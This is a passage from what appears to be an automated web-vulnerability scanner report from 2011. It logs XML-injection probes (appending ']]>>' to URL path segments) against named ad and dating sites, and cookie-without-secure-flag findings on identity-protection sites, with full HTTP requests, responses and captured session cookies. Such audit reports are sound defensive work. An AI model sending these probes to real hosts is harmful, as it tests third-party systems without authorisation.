...[SNIP]...

9.7. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://delivery.ctasnet.com
Path:   /adserver/www/delivery/tjs.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adserver/www]]>>/delivery/tjs.php?trackerid=276&append=1&r=96277 HTTP/1.1
Host: delivery.ctasnet.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2182862;type=websi010;cat=homep146;ord=1;num=8709666307549.924?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 24 Apr 2011 12:10:33 GMT
Server: lighttpd/1.4.26
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.8. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://delivery.ctasnet.com
Path:   /adserver/www/delivery/tjs.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adserver/www/delivery]]>>/tjs.php?trackerid=276&append=1&r=96277 HTTP/1.1
Host: delivery.ctasnet.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2182862;type=websi010;cat=homep146;ord=1;num=8709666307549.924?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 24 Apr 2011 12:10:40 GMT
Server: lighttpd/1.4.26
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.9. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://delivery.ctasnet.com
Path:   /adserver/www/delivery/tjs.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /adserver/www/delivery/tjs.php]]>>?trackerid=276&append=1&r=96277 HTTP/1.1
Host: delivery.ctasnet.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2182862;type=websi010;cat=homep146;ord=1;num=8709666307549.924?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 24 Apr 2011 12:10:45 GMT
Server: lighttpd/1.4.26
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

9.10. http://kroogy.com/search/images/blank.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://kroogy.com
Path:   /search/images/blank.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /search/images/blank.gif]]>> HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: kroogy.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:46:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; expires=Mon, 23-Apr-2012 12:46:11 GMT; path=/
Set-Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; expires=Mon, 23-Apr-2012 12:46:11 GMT; path=/
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 43376

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<SCRIPT LANGUAGE="JavaScript">
function showcheckbox()
{
if(document.getElementByI
...[SNIP]...
search").style.border="0px";

    document.getElementById("livesearch").style.padding="0px";

return;

}

xmlhttp=GetXmlHttpObject()

if (xmlhttp==null)

{

alert ("Your browser does not support XML HTTP Request");

return;

}

document.getElementById("livesearch").style.padding="0px";

type=document.searchform.type.value;

var url="http://kroogy.com/index/livesearch";

url=url+"&q="+str;

ur
...[SNIP]...

9.11. http://www.dictof.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.dictof.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
Host: www.dictof.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FC101987E2340D1CA7E9F5BBE7019BA1.w1; lc=en; CAMPAIGNE.REFERER_COOKIE=http%3A%2F%2Fkroogy.com%2Fpub%2Fbanner_728_90_random.php; CAMPAIGNE.ENTRY_DATE_COOKIE=1303648014948; CAMPAIGNE.ENTRY_URI_COOKIE=%2F; __utmz=121015709.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utma=121015709.328301938.1303648022.1303648022.1303648022.1; __utmc=121015709; __utmb=121015709.1.10.1303648022; __utmz=262432266.1303648022.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; __utma=262432266.188043035.1303648022.1303648022.1303648022.1; __utmc=262432266; __utmv=262432266.dating%2Fmillionaire%2Fl1%2Fblack-orange-gray%2Ft023; __utmb=262432266.2.10.1303648022

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Sun, 24 Apr 2011 12:45:28 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: lc=en; Path=/
Content-Language: en
Content-Length: 3614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Online dating
...[SNIP]...
<a href="/sitemap.xml">XML Site Map</a>
...[SNIP]...

10. SSL cookie without secure flag set  previous  next
There are 13 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


10.1. https://secure.identityguard.com/EnrollmentStep1  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /EnrollmentStep1

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EnrollmentStep1?storeId=10051&MID=40642&mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1 HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; 90226925_clogin=l=1303614597&v=1&e=1303615916987

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:36:12 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
Set-Cookie: JSESSIONID=0000KToyasEeVy_fQHf6TuSK9Mc:14ej3pg70; Path=/
Set-Cookie: REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; Expires=Sun, 08 May 2011 03:35:20 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002777198=100000002777198%2cVoEQEMAaxiiOxH5%2fHe03xssaVwY%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_100000002777198=100000002777198%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvblgaG4LolUzuM7owtK6Gi%2bVaq7muVpgRvizF3GEYunmq5qAGshvG%2fXVXEJobjTsDIa%0auhm1cgxjc8Dg7Bta%2bhk6VW6qOQMB228jrA07GAd7ulM%2f%2bYbi2c00FUf8MBs4lni1kKc%2bItFLUY8t%0a%2bqcUB9ES; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US
Content-Length: 0


10.2. https://secure.lifelock.com/portal/login  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.lifelock.com
Path:   /portal/login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /portal/login HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.1.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; 480-CT=3114#4/24/2011/2/56/45

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:09:21 GMT
Set-Cookie: JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; Path=/
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:24:21 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=d566ab28e565142c668f1a3223da9d8931f2a75f23110e424db39461; Path=/
Vary: Accept-Encoding
Content-Length: 5371

<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" >
<html>
   <head>
       <title>LifeLock Member Portal | Sign In</title>
       <link href="../styles/login.css" rel="stylesheet" type="text/css" med
...[SNIP]...

10.3. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout?langId=-1&storeId=10051&catalogId=&ddkey=https:Logoff HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; WC_SESSION_ESTABLISHED=true; cmTPSet=Y; 90226925_clogin=l=1303614597&v=1&e=1303615926175; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26null%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:32:53 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 8623


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- Start of JSTLEnvironmentSetup.jspf -->



...[SNIP]...

10.4. https://secure.identityguard.com/webapp/wcs/stores/servlet/Logoff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/Logoff

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Logoff?langId=-1&storeId=10051&catalogId=&URL=INTXEnrollSessionTimeout HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_100000002776876=100000002776876%2cFk1AcrNuu6ExBXgm0keyztjSFMM%3d; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_100000002776876=100000002776876%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvZN%2blny%2bAWBcNcgTgEYQTAn%2f5Qm%2ffFEPfXIv63cZlJiaE%2fMDdSGnMW%2fXgGZuQixVSag%0aE8V2RkfRemX3JuHpY1f44dEyBWljB5jE7W5JcSzsAjumrm2fXxlhGQX6XF9b5f6GKyQ%2fwj5G0ndt%0aS7FTQyrm; cmTPSet=Y; 90226925_clogin=l=1303614597&v=1&e=1303615926175

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 03:32:52 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout?langId=-1&storeId=10051&catalogId=&ddkey=https:Logoff
Set-Cookie: WC_AUTHENTICATION_100000002776876=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_100000002776876=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26null%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US
Content-Length: 0


10.5. https://secure.lifelock.com/enrollment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /enrollment

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enrollment?promocode=next&uid=945440258CD1 HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.7.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-CT=3114#4/24/2011/2/56/45|1#4/24/2011/3/8/59; JSESSIONID=D2370E8019A39577DBCB46C2AA38ABFD.lptom03_8000; TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:10:01 GMT
Set-Cookie: promoCode=NEXT; Expires=Mon, 25-Apr-2011 03:10:01 GMT
Pragma: no-cache
Cache-Control: no-cache, max-age=0, must-revalidate, max-age=900
Content-Language: en-US
Expires: Sun, 24 Apr 2011 03:25:01 GMT
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: TS376161=1ab02caf07f2b0502c7d92542a374a3f5438784dc7b0156d4db39461; Path=/
Vary: Accept-Encoding
Content-Length: 22664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>LifeLock.com - E
...[SNIP]...

10.6. https://secure.lifelock.com/resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.lifelock.com
Path:   /resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js HTTP/1.1
Host: secure.lifelock.com
Connection: keep-alive
Referer: https://secure.lifelock.com/enrollment?promocode=next&uid=945440258CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
